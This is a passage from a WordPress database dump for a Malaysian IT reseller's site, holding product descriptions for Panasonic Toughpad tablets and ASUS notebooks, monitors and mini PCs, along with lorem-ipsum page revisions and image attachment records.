srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','publish','closed','closed','','panasonic-toughbook-product','','','2018-12-21 09:55:44','2018-12-21 01:55:44','',0,'https://bintara.com.my/?page_id=2580',0,'page','',0),(2581,1,'2018-12-19 17:13:26','2018-12-19 09:13:26','','Elementor #2580','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:13:26','2018-12-19 09:13:26','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2582,1,'2018-12-19 17:15:41','2018-12-19 09:15:41','<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Elementor #2580','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:15:41','2018-12-19 09:15:41','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2583,1,'2018-12-19 17:18:48','2018-12-19 09:18:48','<h2>Add Your Heading Text Here</h2>\r\n<h2>Add Your Heading Text Here</h2>\r\n<h2>Add Your Heading Text Here</h2>\r\n<h2>Add Your Heading Text Here</h2>\r\nClick edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\r\n\r\nClick edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:18:48','2018-12-19 09:18:48','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2643,1,'2018-12-20 14:39:27','2018-12-20 06:39:27','','DXS-1210-12SC_A1_Image-LFront-510x600-510x600','','inherit','closed','closed','','dxs-1210-12sc_a1_image-lfront-510x600-510x600','','','2018-12-20 14:39:27','2018-12-20 06:39:27','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg',0,'attachment','image/jpeg',0),(2644,1,'2018-12-20 14:39:46','2018-12-20 06:39:46','','DXS-1210-10TS_A1_Image-LFront-510x6003-510x600','','inherit','closed','closed','','dxs-1210-10ts_a1_image-lfront-510x6003-510x600','','','2018-12-20 14:39:46','2018-12-20 06:39:46','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600.jpg',0,'attachment','image/jpeg',0),(2645,1,'2018-12-20 14:40:05','2018-12-20 06:40:05','','ProductMainImage1-510x600 (1)','','inherit','closed','closed','','productmainimage1-510x600-1','','','2018-12-20 14:40:05','2018-12-20 06:40:05','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png',0,'attachment','image/png',0),(2646,1,'2018-12-20 14:40:36','2018-12-20 06:40:36','','DGS-1210-52MPP_E1_Image-LFront-510x600-510x600','','inherit','closed','closed','','dgs-1210-52mpp_e1_image-lfront-510x600-510x600','','','2018-12-20 14:40:36','2018-12-20 06:40:36','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg',0,'attachment','image/jpeg',0),(2585,1,'2018-12-19 17:22:26','2018-12-19 09:22:26','<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:22:26','2018-12-19 09:22:26','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2584,1,'2018-12-19 17:21:03','2018-12-19 09:21:03','<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:21:03','2018-12-19 09:21:03','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2587,1,'2018-12-19 17:27:18','2018-12-19 09:27:18','<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:27:18','2018-12-19 09:27:18','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2588,1,'2018-12-19 17:28:33','2018-12-19 09:28:33','<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:28:33','2018-12-19 09:28:33','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2589,1,'2018-12-19 17:30:02','2018-12-19 09:30:02','<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<h2>Add Your Heading Text Here</h2>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p><p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>[maxbutton id=\"1\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-19 17:30:02','2018-12-19 09:30:02','',2580,'https://bintara.com.my/blog/2018/12/19/2580-revision-v1/',0,'revision','',0),(2674,1,'2018-12-20 17:06:20','2018-12-20 09:06:20','<h3>NOTEBOOK</h3>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>MONITOR</h3>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>DESKTOP</h3>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, 